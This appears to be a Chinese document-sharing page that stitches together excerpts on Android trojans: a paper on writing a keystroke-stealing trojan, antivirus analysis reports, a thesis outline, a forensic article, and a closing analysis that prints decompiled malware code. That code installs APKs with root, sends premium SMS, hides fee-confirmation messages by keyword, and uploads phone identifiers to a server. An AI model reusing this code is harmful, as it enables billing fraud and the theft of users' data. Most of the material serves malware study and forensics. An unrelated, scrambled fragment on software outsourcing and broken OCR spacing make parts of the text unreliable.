Android木马分析与编写
浅谈安卓手机安全及安卓手机木马编程
在智能手机风生水起 的时代 , 安卓智能手机 占据 了大部分 席位 ,就最新统计 的数据来看 ,A n d r o i d智能手机在 中国的占 有 率为 8 6 % 。所 以,正如 W i n d o w s操作系统有如此多 的用户一 样 ,不可避 免的会 带来安全性问题 。随着智 能手机 的普及 ,手 机 的安全 性也变得越来越热 门和重要 。 a n d r o i d系统是一个 以 L i n u x为基础的半开源操作系统 , 其 内核 属于 L i n u x内核的・个分支 , 具有典型的 L i n u x调度和 功 能。所 以,一个 N a t i v e C 程 序,经过交叉编译,完全可 以 在A n d r o i d系统上运行。 我们 的 目标 是编写一个简单的手机木马, 这个 木马分为服 务端和客户端两个 部分, 实现 的功能是客 户端 可以获取手机 的 按键信 息,并把信 息发送给服务端 。 核心源码 如下: . 其 实 这 个手 机 木 马就 是 通 过 s o c k e t连 接 来编 写的 , s o c k e t部分大家都应该 比较清楚 了,那就讲讲字 符处理的部 分吧 。 服务 端部分 :服 务端 的核心部就是 接收客户端 发送 的信 息 ,并显示 出来 。 i n t m a i n ( i n t a r g o ,c h a r* a r g v [ ] ) {/ 木 省略部分代码 , 以下为核心代码水 /
消费 电子
计算机 科学 C o n s u me r E l e c t r o n i c s Ma g a z i n e 2 0 1 3 年 7月下
浅谈安卓手机安全及安卓手机木马编程
吴 栋
( 杭 州电子科技 大学 ,杭 州 3 1 0 0 1 8) 摘 J r - :随着手机使 用的普及 ,手机职 能技 术越 来越 先进 ,大部分手机都安装 了最 为先进 的智 能系统 ,不仅可 以通话 ,同时还具备 多种上 网功能 、在 线购 物付 款功能、在线炒股、在线转账等功能 ,这些功能 的加入 同时也使得 手机 的安 全性越 来越 受到威胁 ,因此研 究现 阶段 智能手机 的安 全功能保 障及相应的故障 防卫编程成为智能手机发展
Android木马HongTouTou分析报告
Android木马HongTouTou分析报告\Android木马HongTouTou分析报告安天实验室Android木马HongTouTou分析报告安天实验室一、基本信息病毒名称:Trojan/Android.Adrd.a[Clicker]病毒别名: HongTouTou、ADRD病毒类型:木马样本MD5:A84997B0D220E6A63E2943DA64FFA38C样本CRC32:A42850DE样本长度:1,316,981 字节原始文件名:Newfpwap_com_liveprintslivewallpaper.apk出现时间:2011.01.27感染系统:Android 2.0及以上二、概述ADRD木马(又名HongTouTou木马)被植入十余款合法软件中(图1),通过多家论坛、下载站点分发下载实现大范围传播。
其主要行为包括:开启多项系统服务;每6小时向控制服务器发送被感染手机的IMEI、IMSI、版本等信息;接收控制服务器传回的指令;从数据服务器取回30个URL;依次访问这些URL,得到30个搜索引擎结果链接;在后台逐一访问这些链接;下载一个.apk安装文件到SD卡指定目录。
感染该木马的手机将产生大量网络数据流量,从而被收取流量费用。
攻击者通过增加搜索链接的访问量而获益。
用户可以下载安天提供的Android恶意代码专查工具AScanner检测手机是否感染这一木马,并卸载相应软件将其清除。
图1 正常软件与被植入木马的软件三、样本特征截止本分析报告发布,安天已经检测到ADRD木马(又名HongTouTou木马)被植入到下列Android 软件:●动态脚印动态壁纸Live Prints Live Wallpaper●TurboFly 3D●Robo 3●iReader●桌面时钟天气Fancy Widget Pro●炫彩方块动态壁纸 Light Grid●超级酷指南针●指纹解锁●夕阳轮廓动态壁纸上述被植入木马的软件最早出现于2010年12月21日。
Android手机木马提取与分析
必须 掌 握 网 络 钓 鱼 的 原 理 、A ndroid木 马 反 编 译 、应 用 程 序 安 装 包 提 取 等 专 业 知 识 . 基 于 上 述 分 析 ,通过案例 探 讨 在 电 信 钓 鱼 诈 骗 案 件 中 ,A ndroid木 马 a p k 的 提 取 方 式 和 a p k 反 编 译 分 析 ,并 通 过 示 例 操 作 进 一 步 认 识 A n droid手 机 木 马 的 提 取 和 分 析 方 法 . 关 键 词 :网 络 诈 骗 ;手 机 木 马 ; a d b ; 反编译 中图分类号:T P 3 9 3 文 献 标 识 码 :A 文 章 编 号 =1674 -5 6 3 9 (2 0 1 6 )0 6 -0 0 5 6 -0 7 DOI :1 0 .14091/j. cnki. kmxyxb. 2016. 06. 013
网络诈骗是以手机等可上网的设备为媒介, 采用电信设备通过欺骗的方式骗取款额较大的公 私财物的犯罪活动,其 中 网 络 钓 鱼 的 危 害 较 大 [1]. 诈骗团伙的诈骗方式是使用伪基站设备进行钓鱼 短 信 群 发 ,利 用 被 害 人 好 奇 、贪 财 、好 利 的 心 理 ,诱 骗 被 害 人 点 击 短 信 中 的 钓 鱼 链 接 ,被害 人 只 要 点 击 了 犯 罪 团 伙 提 供 的 钓 鱼 链 接 ,其 手 机 就 将 被 安 装 木 马 ,诈 骗 团 伙 能 够 实 现 远 程 控 制 ,达到盗取被
Detecting and Analyzing on Android Cell Phone Trojan
基于Android手机录音木马的原理分析与实现
件产 品质量保证的核心部分 。 软件配置管理伴 随着软件产 品的 在迅速 发展 ,并逐渐 形成产业规模,中小规模 的软件企业也纷 整个 生命周期 , 不仅能够准确 的掌握项 目各个里程碑 阶段的实 纷 建立软件 外包联盟 。本课题主 要从软件外 包行业 的发展现 际情况 ,还能够控制软件产 品项 目的开发进度 , 使得软件产 品 状 、 目前软件外包保证 方面存在 的问题 以及影响因素三个方面 最 的开发能够及时的适应新 的需求 的变动 , 从而确保软件产 品有 进行探 讨, 终在 软件 外包 质量 保证 实施 方面给出 了具体的工 条不 紊的按照进度开展 , 在提高工作效率 的同时, 也使得 软件 作 内容 以及 关键 技术 。因此 ,只要使用合理 的技术手段 ,通过 产 品成 功开发的概率大大提升 。 最后一个技术便是检查表 以及 与 需求 以及 标准 的对 比 , 发现软件产 品存 在的 问题 并及时的进 模版 , 检查表 以及模版是形成软件产 品保证报 告的基础 , 过 行解 决,便 可以最大限度 地保证外包类软件产 品的质量 。 通 检查表 以及模 版可 以简化文档 的工作 , 但是 , 同的软件产 品 不
效率 , 短开 发周 期,提高测试 以及性 能维护的效率。软件配 软件发包方 主要 来 自欧美和 日本 。 缩 随着科学技术 的进步 , 国 我 中 置管理,作为外包软件项 目研发 的重要过程 , 软件配置 管理在 软件外 包行 业也逐渐 变得愈加的具备竞争优势 , 国各地如北
确 保外 包软件产品质量的过程 中起到 了至关重要 的作用 , 是软 京 、上海 、大连 、西安 、杭州 、合肥 等城 市的软件外包行业正
2 1. 1 突发异常状况 的准备工作 。在例外事件发生的情况 下, 当有 件导刊,0 应
Android木马Smspacem分析报告
Android木马Smspacem分析报告Android木马Smspacem分析报告安天实验室Android木马Smspacem分析报告安天实验室一、基本信息病毒名称:Trojan/Android.Smspacem病毒类型:木马样本MD5:60CE9B29A6B9C7EE22604ED5E08E8D8A样本长度: 1855,053 字节发现时间:2011.05.22感染系统:Android 2.1及以上二、概述Smspacem木马主要行为是在开机时自启动,被该恶意软件感染的设备会自动获取手机用户通讯录中的信息(联系人名称、电话号码、Email等),自动向其联系人电话发送短信,其内容为事先编辑好的,如“现在无法通话,世界末日即将来临”等;该软件还试图访问指定的主机服务,并将从被感染设备的通讯录中获得的邮箱地址发送到远程服务器上;最后还会将被感染设备的壁纸修改为事先设定好的图像。
当被该恶意软件感染的设备接收短信时,短信将被拦截,并且该恶意软件将删除短信数据库中的短信,并且向该短信的发送地址发送一条事先编辑好的信息,如“现在无法通话,世界末日即将来临”等。
这一类的木马主要由最近关于世界末日将于2011年5月21日来临的新闻所引起。
抵御木马的关键是用户要对自己的设备进行安全设置,并在安装软件后查看其权限中是否存在敏感的权限等。
图 1 Holy软件界面及特殊权限三、样本特征3.1敏感权限●允许应用程序访问设备的手机功能:有此权限的应用程序可以确定此手机的号码和序列号、是否正在通话、以及对方的号码等。
●允许应用程序发送短信:恶意应用程序可能会不经您的确认就发送信息,给您产生费用。
●允许应用程序写入手机或 SIM 卡中存储的短信:恶意应用程序可借此删除您的信息。
●允许应用程序读取您的手机或 SIM 卡中存储的短信:恶意应用程序可借此读取您的机密信息。
●允许应用程序接收和处理短信:恶意应用程序可借此监视您的信息,或者将信息删除而不向您显示。
Android智能手机木马的研究与实现分析
II
目录
目录
第一章 绪 论 .................................................................................................................. 1 1.1 研究工作的背景及意义 ............................................................................... 1 1.2 研究工作的国内外研究现状 ....................................................................... 4 1.3 研究工作的目标和内容 ............................................................................... 6 1.4 论文的章节安排 ........................................................................................... 6 第二章 ANDROID 相关理论技术概述 ......................................................................... 8 2.1 Android 的系统架构 ...................................................................................... 8 2.2 Android 的应用程序组件 ............................................................................ 10 2.3 Android 的安全机制 .................................................................................... 13 2.3.1 Android 的沙箱机制与共享机制 ......................................................... 13 2.3.2 Android 的权限机制 ............................................................................. 15 2.4 本章小结 ..................................................................................................... 18 第三章 ANDROID 智能手机木马的技术分析 ........................................................... 19 3.1 Android 智能手机木马的植入技术 ............................................................ 19 3.2 Android 智能手机木马的隐藏技术 ............................................................ 20 3.3 Android 智能手机木马的后台监听技术 .................................................... 24 3.4 Android 智能手机木马的信息截取和回传技术 ........................................ 27 3.5 本章小结 ..................................................................................................... 34 第四章 ANDROID 智能手机木马的实现分析 ........................................................... 35 4.1 Android 智能手机木马的整体方案 ............................................................ 35 4.1.1 Android 智能手机木马的整体结构和运行流程 ................................. 35 4.1.2 Android 智能手机木马的服务端 ......................................................... 37 4.1.3 Android 智能手机木马的客户端 ......................................................... 37 4.2 Android 智能手机木马的功能模块的实现分析 ........................................ 38 4.2.1 Android 智能手机木马的静默运行和隐藏的实现分析 ..................... 38 4.2.2 Android 智能手机木马的短信获取模块的实现分析 ......................... 41 4.2.3 Android 智能手机木马的通话记录获取模块的实现分析 ................. 45 4.2.4 Android 智能手机木马的用户联系人信息获取模块的实现分析 ..... 49 4.2.5 Android 智能手机木马的设备信息获取模块的实现分析 ................. 53
手机木马实验报告
手机木马实验报告手机木马实验报告1. 引言手机木马是一种恶意软件,它能够在用户不知情的情况下获取手机的敏感信息、控制手机的功能以及传播自身。
为了深入了解手机木马的工作原理和危害程度,我们进行了一系列的实验。
2. 实验目的本次实验的目的是通过模拟手机木马的攻击行为,评估其对手机和用户的威胁程度,以及提供相应的防护建议。
3. 实验方法我们使用了一台安装有最新操作系统和杀毒软件的Android手机作为实验对象。
通过下载一款模拟手机木马的应用程序,并在实验过程中监测其行为,我们能够了解手机木马的攻击方式、传播途径以及对手机的影响。
4. 实验结果在实验过程中,我们观察到以下几个现象:4.1 敏感信息获取手机木马能够在用户不知情的情况下获取手机中的敏感信息,如联系人、短信、通话记录等。
我们发现,模拟的手机木马成功地获取了手机中的敏感信息,并将其上传到了远程服务器上。
4.2 功能控制手机木马可以远程控制手机的各项功能,包括拍照、录音、发送短信等。
我们测试了模拟木马的远程控制功能,发现它能够远程激活手机的摄像头,并将拍摄到的照片发送到远程服务器。
4.3 自我传播手机木马可以通过各种方式自我传播,如通过短信、应用商店等。
我们模拟了手机木马的传播行为,并观察到它成功地向其他手机发送了包含木马应用的短信,并诱导用户下载安装。
5. 结果分析通过以上实验结果,我们可以得出以下几点结论:5.1 手机木马对用户隐私的侵犯程度非常高,能够获取用户的敏感信息并传输给攻击者。
5.2 手机木马的功能控制能力使得攻击者可以远程操控手机,可能导致更严重的后果,如偷拍、窃听等。
5.3 手机木马的自我传播能力使得其传播速度非常快,可能导致大规模的感染。
6. 防护建议为了保护手机和用户的安全,我们提出以下防护建议:6.1 安装可信任的杀毒软件,并及时更新病毒库。
6.2 不要随意下载来历不明的应用程序,尤其是通过非官方渠道下载。
6.3 注意手机的权限设置,仅授权给必要的应用。
android手机木马的提取与分析
android手机木马的提取与分析Android手机木马病毒的提取与分析为有效侦破使用手机木马进行诈骗、盗窃等违法犯罪的案件,对手机木马病毒的特点、植入方式、运行状态进行了研究,利用dex2jar、jdgui等工具软件查看apk文件源代码。
结合实例,讲述了如何提取关键代码与配置数据,并对手机木马病毒的危险函数、启动方式、权限列表进行分析,证明了该方法的可行性,提取了违法犯罪行为的关键线索服务于侦查办案和证据固定。
智能手机给用户带来便利的同时,手机恶意软件也在各种各样的违法活动中充当了重要角色,其中手机木马病毒犯罪日渐加速化、产业链化、智能化和隐藏化。
Android手机木马病毒主要完成植入木马、运行病毒、监控手机、盗取信息、转走钱财。
他们伪造成“XX照片”、“违章查询处理”、“开房记录查看”、“XX神器”等易于被人点击安装的方式出现,这种恶意短信中附的网址,其实就是诱导下载一个手机软件,安装后手机内并不会显示出该应用,但其中的木马病毒已植入,后台会记录下机主的一切操作,可以随时监控到手机记录。
若机主登录网银、支付宝、微信红包等,银行卡账号、密码就都被泄露了,黑客能轻易转走资金。
此类案件近期呈现高发的趋势。
面对各种各样善于伪装隐藏的手机木马病毒,如何提取分析,并固定证据成为一项重要工作。
本文从Android手机木马病毒的特点入手,讲述了如何提取分析关键代码与配置数据,从而分析出违法犯罪行为的关键线索服务于侦查办案和证据固定。
诈骗、盗窃的目标不变,那就是诱导点击安装短信的链接网址中的木马。
木马植入到目标系统,需要一段时间来获取信息,必须隐藏自己的行踪,以确保木马的整体隐藏能力,以便实现长期的目的。
主要包括本地隐藏、文件隐藏、进程隐藏、网络连接隐藏、内核模块隐藏、通信隐藏、协同隐藏、日志过滤和Rootkit模块的隐藏。
然后实现了Android系统下木马攻击的各种功能,主要有删除SIM卡和手机里的通讯录、删除SD卡里的文件和上传文件到电脑控制端。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
Android 木马分析与编写作者 mangel一、 Android 木马介绍Android 系统比iPhone 系统更开放,允许安装第三方应用程序,甚至是那些没有获得谷歌应用商店Android Market 批准的应用程序,但这种开放性似乎也增加了安全风险。
Android Marke 本身也发现了恶意软件感染的应用程序,不过用户可以像在个人电脑上所做的那样,通过安装杀毒软件来加以防范。
二、 概述该程序安装完是一款桌面主题,并可设置壁纸等。
运行后获取ROOT 权限,私自下载安装程序;并发送扣费短信,订制SP 服务,拦截掉回执的扣费确认短信,恶意消耗用户资费;窃取用户通讯录信息等隐私资料,并上传到服务器。
三、 样本特征1. 敏感权限 <uses-permission android:name="android.permission.DELETE_PACKAGES"黑客防线 w w w .h a c ke r .c o m .cn转载请注明出处></uses-permission> <uses-permission android:name="android.permission.INSTALL_PACKAGES" ></uses-permission> <uses-permission android:name="android.permission.READ_CONTACTS" ></uses-permission> android.setting.START_SEND_SMS android.setting.SMS_SENTandroid.provider.Telephony.SMS_RECEIVED2. 入口点和恶意模块public class MyReceiver extends BroadcastReceiver{}(1).发送拦截短信:String str39 = "android.setting.SMS_SENT"; try{String str41 = arrayOfSmsMessage[i13].getOriginatingAddress(); SmsManager localSmsManager4 = localSmsManager1; ArrayList localArrayList7 = localArrayList2;localSmsManager4.sendMultipartTextMessage(str41, null, localArrayList5, localArrayList7, null); }if (!paramIntent.getAction().equals("android.provider.Telephony.SMS_RECEIVED")) if ((arrayOfSmsMessage[i13].getOriginatingAddress().contains("10658166")) || (arrayOfSmsMessage[i13].getMessageBody().contains("83589523")) || (arrayOfSmsMessage[i13].getMessageBody().contains("客服")) || (arrayOfSmsMessage[i13].getMessageBody().contains("资费")) || (arrayOfSmsMessage[i13].getMessageBody().contains("1.00元")) || (arrayOfSmsMessage[i13].getMessageBody().contains("2.00元")) || (arrayOfSmsMessage[i13].getMessageBody().contains("元/条")) || (arrayOfSmsMessage[i13].getMessageBody().contains("元/次"))) abortBroadcast();(2). 获取ROOT 权限,安装卸载程序:private void installApk(String paramString1, String paramString2)try{Runtime localRuntime = Runtime.getRuntime();StringBuilder localStringBuilder = new StringBuilder("sudo pm install -r ");黑客防线 w w w .h a c ke r .c o m .cn转载请注明出处File localFile2 = this.mContext.getFilesDir(); String str = localFile2 + "/" + paramString2; Process localProcess = localRuntime.exec(str); }private void installAPK() private void uninstallPlugin() { try {int i = Log.d("agui", "uninstall");Process localProcess = Runtime.getRuntime().exec("pm uninstall -r com.newline.root"); Intent localIntent1 = new Intent("android.intent.action.RUN"); Context localContext = this.mContext;Intent localIntent2 = localIntent1.setClass(localContext, MyService.class);ComponentName localComponentName = this.mContext.startService(localIntent1); return;}(3).窃取上传隐私资料:String str8 = Long.toString(System.currentTimeMillis()); Object localObject1 = localHashtable.put("id", str8); Object localObject2 = localHashtable.put("imsi", str4); Object localObject3 = localHashtable.put("imei", str5); Object localObject4 = localHashtable.put("iccid", str6); Object localObject5 = localHashtable.put("mobile", str7);String str9 = TimeUtil.dateToString(new Date(), "yyyyMMddHHmmss"); Object localObject6 = localHashtable.put("ctime", str9); Object localObject7 = localHashtable.put("osver", "1");Object localObject8 = localHashtable.put("cver", "010101"); Object localObject9 = localHashtable.put("uid", str1); Object localObject10 = localHashtable.put("bid", str2); Object localObject11 = localHashtable.put("pid", str3);Object localObject12 = localHashtable.put("softid", paramString2);MessageService.4 local4 = new MessageService.4(this, paramIResponseListener); NetTask localNetTask = new NetTask(localHashtable, "utf-8", 0, local4); String[] arrayOfString = new String[1]; arrayOfString[0] = paramString1;AsyncTask localAsyncTask = localNetTask.execute(arrayOfString);public class NetTask extends AsyncTask<String, Integer, String> protected String doInBackground(String[] paramArrayOfString) URL localURL1 = new java/net/URL;String str5 = localStringBuffer1.toString();黑客防线 w w w .h a c ke r .c o m .cn转载请注明出处URL localURL2 = localURL1; String str6 = str5;localURL2.<init>(str6);localHttpURLConnection = (HttpURLConnection)localURL1.openConnection(); localHttpURLConnection.setRequestMethod("GET"); localHttpURLConnection.setConnectTimeout(5000); localHttpURLConnection.setReadTimeout(5000);3. 敏感字符串("sudo pm install -r "); installAPK();contains("10658166") contains("83589523")contains("客服")contains("资费")四、 行为分析运行后获取ROOT 权限,私自下载安装程序;并发送扣费短信,订制SP 服务,拦截掉回执的扣费确认短信,恶意消耗用户资费;窃取用户通讯录信息等隐私资料,并上传到服务器。